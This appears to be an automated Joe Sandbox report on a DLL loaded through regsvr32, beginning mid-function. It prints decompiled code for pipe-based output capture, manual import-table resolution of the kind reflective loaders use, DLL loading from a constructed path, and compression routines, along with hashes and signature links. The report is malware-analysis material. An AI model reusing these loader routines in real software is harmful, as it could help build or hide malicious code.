				_t126 = E10008604(0x1001);
				_v28 = _t126;
				if(_t126 == 0) {
					goto L18;
				}
				_push( &_v64);
				_push( &_v140);
				_t85 =  *0x1001e684; // 0x219faa0
				_push(0);
				_push(0);
				_push(0x8000000);
				_push(1);
				_push(0);
				_push(0);
				_push(_v24);
				_push(0);
				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
					goto L13;
				}
				_t87 =  *0x1001e684; // 0x219faa0
				 *((intOrPtr*)(_t87 + 0x30))(_v12);
				_t89 =  *0x1001e684; // 0x219faa0
				 *((intOrPtr*)(_t89 + 0x30))(_v16);
				_v24 = _v24 & 0;
				do {
					_t92 =  *0x1001e684; // 0x219faa0
					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
					 *((char*)(_v24 + _t126)) = 0;
					if(_t111 == 0) {
						_t127 = E100091A6(_t126, 0);
					} else {
						_push(0);
						_push(_t126);
						_v32 = _t127;
						_t127 = E10009292(_t127);
						E1000861A( &_v32, 0xffffffff);
						_t130 = _t130 + 0x14;
					}
					_t111 = _t127;
					_v32 = _t127;
				} while (_v36 != 0);
				_push( &_v36);
				_push(E1000C379(_t127));
				_t98 =  *0x1001e68c; // 0x219fc68
				_push(_t127);
				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
					L12:
					_t100 =  *0x1001e684; // 0x219faa0
					 *((intOrPtr*)(_t100 + 0x30))(_v64);
					_t102 =  *0x1001e684; // 0x219faa0
					 *((intOrPtr*)(_t102 + 0x30))(_v60);
					goto L13;
				}
				_t128 = E10009256(_t127);
				if(_t128 == 0) {
					goto L12;
				}
				E1000861A( &_v32, 0);
				return _t128;
			}




































        0x1000a9c2
        0x1000a9c4
        0x1000a9d0
        0x1000a9d5
        0x1000a9d8
        0x1000a9da
        0x1000a9dd
        0x1000a9e0
        0x1000a9e7
        0x1000a9ea
        0x1000a9f1
        0x1000a9f4
        0x1000a9fe
        0x1000a9ff
        0x1000aa02
        0x1000aa04
        0x1000aa05
        0x1000aa1c
        0x1000ab9c
        0x00000000
        0x1000ab9c
        0x1000aa33
        0x1000ab68
        0x1000ab6e
        0x1000ab79
        0x1000ab7b
        0x1000ab83
        0x1000ab83
        0x1000ab8a
        0x1000ab8c
        0x1000ab95
        0x1000ab95
        0x00000000
        0x1000ab98
        0x1000aa39
        0x1000aa3c
        0x1000aa3f
        0x1000aa45
        0x1000aa4f
        0x1000aa59
        0x1000aa60
        0x1000aa69
        0x1000aa6b
        0x1000aa71
        0x00000000
        0x00000000
        0x1000aa7c
        0x1000aa83
        0x1000aa84
        0x1000aa89
        0x1000aa8a
        0x1000aa8b
        0x1000aa90
        0x1000aa92
        0x1000aa93
        0x1000aa94
        0x1000aa97
        0x1000aa9d
        0x00000000
        0x00000000
        0x1000aaa3
        0x1000aaab
        0x1000aaae
        0x1000aab6
        0x1000aab9
        0x1000aabc
        0x1000aac2
        0x1000aad6
        0x1000aadc
        0x1000aae2
        0x1000ab0b
        0x1000aae4
        0x1000aae4
        0x1000aae6
        0x1000aae8
        0x1000aaf0
        0x1000aaf8
        0x1000aafd
        0x1000aafd
        0x1000ab11
        0x1000ab13
        0x1000ab13
        0x1000ab1b
        0x1000ab23
        0x1000ab24
        0x1000ab29
        0x1000ab32
        0x1000ab52
        0x1000ab52
        0x1000ab5a
        0x1000ab5d
        0x1000ab65
        0x00000000
        0x1000ab65
        0x1000ab3b
        0x1000ab3f
        0x00000000
        0x00000000
        0x1000ab47
        0x00000000

        APIs
        • memset.MSVCRT ref: 1000A9F4
        • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 1000AA18
        • CreatePipe.KERNEL32(100065A9,?,0000000C,00000000), ref: 1000AA2F
          • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
          • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: CreateHeapPipe$AllocFreememset
        • String ID: D
        • API String ID: 488076629-2746444292
        • Opcode ID: 6405c1b7d1c6c7a6e3f33fd221f7c85a2d91a5713c5d3a3e097b2ffc08a8e906
        • Instruction ID: bbbe2e048bdb7ca281e90c8594452977dd6133e52a65fc6598db3d6a90d98c7d
        • Opcode Fuzzy Hash: 6405c1b7d1c6c7a6e3f33fd221f7c85a2d91a5713c5d3a3e097b2ffc08a8e906
        • Instruction Fuzzy Hash: DA512871D00219AFEB41CFA4CC85FDEBBB9FB08380F514169F604E7255EB75AA448B61
        Uniqueness

        Uniqueness Score: -1.00%

        Function 1001249B, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151libraryCOMMON
        Download Yara Rule
        C-Code - Quality: 50%
        			E1001249B(signed int __eax, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				void* _t163;

				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E1000E099(_v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v36 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4);
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}






















        0x100124a1
        0x100124a9
        0x100124be
        0x100124d0
        0x100124dc
        0x100124e2
        0x100124e7
        0x100124f3
        0x1001265e
        0x00000000
        0x1001265e
        0x100124f9
        0x10012502
        0x10012510
        0x10012513
        0x10012522
        0x10012522
        0x10012529
        0x10012537
        0x1001253a
        0x10012557
        0x1001255e
        0x1001256e
        0x10012586
        0x10012570
        0x10012578
        0x10012578
        0x10012589
        0x1001258d
        0x10012599
        0x1001259d
        0x100125a1
        0x100125a5
        0x100125b1
        0x100125dc
        0x100125e4
        0x100125f6
        0x10012602
        0x100125b3
        0x100125b8
        0x100125c3
        0x100125cf
        0x100125cf
        0x1001260b
        0x10012611
        0x1001261b
        0x10012637
        0x1001261d
        0x1001262c
        0x1001262c
        0x1001261b
        0x1001263f
        0x10012648
        0x10012648
        0x10012656
        0x00000000
        0x10012656
        0x10012562
        0x00000000
        0x10012562
        0x00000000
        0x1001253a
        0x00000000

        APIs
        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 100124B8
        • LoadLibraryA.KERNEL32(00000000), ref: 10012551
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: HandleLibraryLoadModule
        • String ID: GetProcAddress$kernel32.dll
        • API String ID: 4133054770-1584408056
        • Opcode ID: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
        • Instruction ID: 32dcb2393de001d92d0e2ea9b2cd9e3cf8e07861903f3f539e44592daf5cdc58
        • Opcode Fuzzy Hash: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
        • Instruction Fuzzy Hash: 7A617AB5D00209EFDB40CF98C881BADBBF1FF08355F208599E815AB2A1C774AA90DF50
        Uniqueness

        Uniqueness Score: -1.00%

        Function 1000C4CE, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117libraryCOMMON
        Download Yara Rule
        C-Code - Quality: 89%
        			E1000C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				char* _t63;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x1001e688; // 0x2120590
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E100095E1(_t50, 0xb62);
					_t66 =  *0x1001e688; // 0x2120590
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E10009640( &_v140, 0x40, L"%08x", E1000D400(_t66 + 0xb0, E1000C379(_t66 + 0xb0), 0));
					_t20 =  *0x1001e688; // 0x2120590
					asm("sbb eax, eax");
					_t25 = E100095E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
					_t63 = "\\";
					_t26 =  *0x1001e688; // 0x2120590
					_t68 = E100092E5(_t26 + 0x1020);
					_v12 = _t68;
					E100085D5( &_v8);
					_t32 =  *0x1001e688; // 0x2120590
					_t34 = E100092E5(_t32 + 0x122a);
					 *0x1001e784 = _t34;
					_t35 =  *0x1001e684; // 0x219faa0
					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x1001e784);
					 *0x1001e77c = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E1000E171(0x1001bb48, _t60);
					}
					 *0x1001e780 = _t38;
					E1000861A( &_v12, 0xfffffffe);
					memset( &_v140, 0, 0x80);
					if( *0x1001e780 != 0) {
						goto L10;
					} else {
						E1000861A(0x1001e784, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x1001e780 == 0) {
						_t46 =  *0x1001e6bc; // 0x219fbc8
						 *0x1001e780 = _t46;
					}
					L10:
					return 1;
				}
			}


























        0x1000c4ce
        0x1000c4ce
        0x1000c4ce
        0x1000c4d1
        0x1000c4dd
        0x1000c4e8
        0x1000c504
        0x1000c509
        0x1000c512
        0x1000c514
        0x1000c51c
        0x1000c53d
        0x1000c542
        0x1000c54f
        0x1000c55a
        0x1000c561
        0x1000c568
        0x1000c579
        0x1000c57f
        0x1000c582
        0x1000c599
        0x1000c5a5
        0x1000c5ad
        0x1000c5b4
        0x1000c5ba
        0x1000c5c6
        0x1000c5cc
        0x1000c5d3
        0x1000c5e6
        0x1000c5d5
        0x1000c5d5
        0x1000c5d8
        0x1000c5de
        0x1000c5e3
        0x1000c5e8
        0x1000c5f3
        0x1000c605
        0x1000c617
        0x00000000
        0x1000c619
        0x1000c620
        0x00000000
        0x1000c626
        0x1000c627
        0x1000c627
        0x1000c62e
        0x1000c630
        0x1000c635
        0x1000c635
        0x1000c63a
        0x1000c63e
        0x1000c63e

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: LibraryLoadmemset
        • String ID: %08x$dll
        • API String ID: 3406617148-2963171978
        • Opcode ID: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
        • Instruction ID: 605655cd81f1f69b7fa92b991eeeb1d6cfabf96bce0b9214bc1f1ebdb38bd664
        • Opcode Fuzzy Hash: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
        • Instruction Fuzzy Hash: 3331E3B2904358ABFB10CBA4DC89F9E33ECEB58394F408029F105E7191EB35EE818724
        Uniqueness

        Uniqueness Score: -1.00%

        Function 10012D70, Relevance: 6.6, APIs: 5, Instructions: 341COMMON
        Download Yara Rule
        C-Code - Quality: 99%
        			E10012D70(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0x84e85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E10015D90(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E10014AF0(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x84e85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E10014C30( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0xdf750008
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x84e85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0xdf750008
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t111 = _a4 + 4; // 0x0
						_t220 =  *_t111;
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E10014C30(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x84e85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x84e85000
							E10015D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E10014AF0( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x84e85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}






















































        0x10012d76
        0x10012d7b
        0x10012d7f
        0x10012d82
        0x10012d82
        0x10012d85
        0x10012d8a
        0x10012d8f
        0x10012d92
        0x10012d97
        0x10012d9a
        0x10012da0
        0x10012da0
        0x10012dab
        0x10012dae
        0x10012db5
        0x10012dba
        0x00000000
        0x00000000
        0x10012dc0
        0x10012dc5
        0x10012dc5
        0x10012dca
        0x10012dd0
        0x10012dda
        0x10012ddf
        0x10012de5
        0x10012e04
        0x10012e07
        0x10012e12
        0x10012e12
        0x10012e12
        0x10012e09
        0x10012e09
        0x10012e0b
        0x00000000
        0x10012e0d
        0x10012e0d
        0x10012e0d
        0x10012e0b
        0x10012e1a
        0x10012e1f
        0x10012e24
        0x10012e2a
        0x10012e2e
        0x10012e31
        0x10012e34
        0x10012e3a
        0x10012e3f
        0x10012e42
        0x10012e48
        0x10012e4d
        0x10012e53
        0x10012e59
        0x10012e5e
        0x10012e61
        0x10012e66
        0x10012e6a
        0x10012e6e
        0x10012e71
        0x10012e74
        0x10012e7d
        0x10012e84
        0x10012e87
        0x10012e8a
        0x10012e8f
        0x10012e94
        0x10012e97
        0x10012e9a
        0x10012e9a
        0x10012e9e
        0x10012ea7
        0x10012eae
        0x10012eb1
        0x10012eb6
        0x10012ebb
        0x10012ebb
        0x10012ebe
        0x10012ec3
        0x00000000
        0x00000000
        0x10012de7
        0x10012de9
        0x10012df6
        0x00000000
        0x00000000
        0x10012df6
        0x10012de9
        0x00000000
        0x10012de5
        0x10012ec9
        0x10012ece
        0x10012ed1
        0x10012ed4
        0x10012f7f
        0x10012f7f
        0x10012eda
        0x10012eda
        0x10012eda
        0x10012edf
        0x10012f09
        0x10012f0c
        0x10012f0c
        0x10012f11
        0x10012f13
        0x10012f15
        0x10012f18
        0x10012f1b
        0x10012f23
        0x10012f28
        0x10012f28
        0x10012f2e
        0x10012f31
        0x10012f34
        0x10012f37
        0x10012f39
        0x10012f39
        0x10012f3a
        0x10012f3a
        0x10012f37
        0x10012f48
        0x10012f4b
        0x10012f4f
        0x10012f54
        0x10012f57
        0x10012f5a
        0x10012f5a
        0x10012f5a
        0x10012f5d
        0x10012f5d
        0x10012f60
        0x10012f60
        0x10012ee1
        0x10012ee1
        0x10012ef1
        0x10012ef4
        0x10012ef9
        0x10012ef9
        0x10012efc
        0x10012eff
        0x10012f02
        0x10012f04
        0x10012f04
        0x10012f63
        0x10012f65
        0x10012f68
        0x10012f68
        0x10012f6e
        0x10012f72
        0x10012f75
        0x10012f77
        0x10012f77
        0x10012f88
        0x10012f8a
        0x10012f8a
        0x10012f92
        0x10012fa0
        0x10012fa3
        0x10012fa5
        0x10012fc5
        0x10012fc5
        0x10012fc8
        0x10012fce
        0x10012fcf
        0x10012fd2
        0x10012fd4
        0x10012fd7
        0x10012fda
        0x10012fdd
        0x10012fe1
        0x10012fe4
        0x10012fe7
        0x10012fea
        0x10012fec
        0x10012fec
        0x10012fef
        0x10012ff1
        0x10012ff1
        0x10012ff4
        0x10012ff6
        0x10012ff9
        0x10013001
        0x10013004
        0x10013009
        0x10013009
        0x1001300f
        0x10013012
        0x10013015
        0x10013017
        0x10013017
        0x10013018
        0x10013018
        0x10013023
        0x10013023
        0x10013023
        0x10013026
        0x10013029
        0x10013029
        0x1001302c
